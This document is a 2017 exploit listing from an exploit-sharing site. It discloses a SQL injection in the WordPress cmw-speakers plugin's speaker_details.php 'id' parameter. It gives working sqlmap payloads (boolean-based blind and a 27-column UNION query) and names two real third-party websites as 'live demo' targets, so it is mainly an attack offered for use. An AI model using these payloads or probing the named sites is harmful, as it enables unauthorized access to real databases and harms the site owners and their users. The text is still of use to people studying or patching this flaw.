Wordpress cmw-speakers Plugin SQL injection Vulnerability

2017-01-13T00:00:00
ID 1337DAY-ID-26667
Type zdt
Reporter xBADGIRL21
Modified 2017-01-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            |----------------------------|
|        [xBADGIRL21]        |
|    [N3W PUBLIC 3XPL0IT]    |
|           _,________       |
|     0day _T _==____() --   |
|         /##(_)-'           |
|        /##/                |
|        x21                 |
|----------------------------|
| Exploit Title : Wordpress cmw-speakers Plugin  SQL injection Vulnerability
| Exploit Author : xBADGIRL21
| Dork : N/A in PUBLISH VERSION
| version : ALL
| Tested on: [ WINDOWS]
| MyBlog : http://xbadgirl21.blogspot.com/
| Date: 13/01/2017
| video Proof : https://youtu.be/Bqnf4Eyniqc
| To buy or Danate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
|--------------------
| [+] Poc :         |
|--------------------
| [id] Get Parameter Vulnerable To SQLi
| http://127.0.0.1/wp-content/plugins/cmw-speakers/speaker_details.php?id=[SQLi]
|--------------------
| [+] SQLmap PoC:   |
|--------------------
| ---
| Parameter: id (GET)
|    Type: boolean-based blind
|    Title: AND boolean-based blind - WHERE or HAVING clause
|    Payload: id=97 AND 8158=8158
|
|    Type: UNION query
|    Title: Generic UNION query (NULL) - 27 columns
|    Payload: id=-9178 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
| ULL,NULL,NULL,CONCAT(0x716a786b71,0x6d5342665a52696145434b4c694e546e61445972684f
| 415a415845655a7a6f647658667459454b77,0x7171627a71),NULL,NULL,NULL,NULL,NULL,NULL
|,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Srfj
| ---
| [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
| GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
|--------------------
| [!] Live Demo :   |
|--------------------
|1) http://cmw.net/radio/wp-content/plugins/cmw-speakers/speaker_details.php?id=9
|2) http://digitalmediasummit.ca/wp-content/plugins/cmw-speakers/speaker_details.php?id=375
|-----------------------------------------------
| Discovered by : xBADGIRL21                   |
| Greetz : All Mauritanien Hackers - NoWhere   |
+----------------------------------------------+

#  0day.today [2018-04-10]  #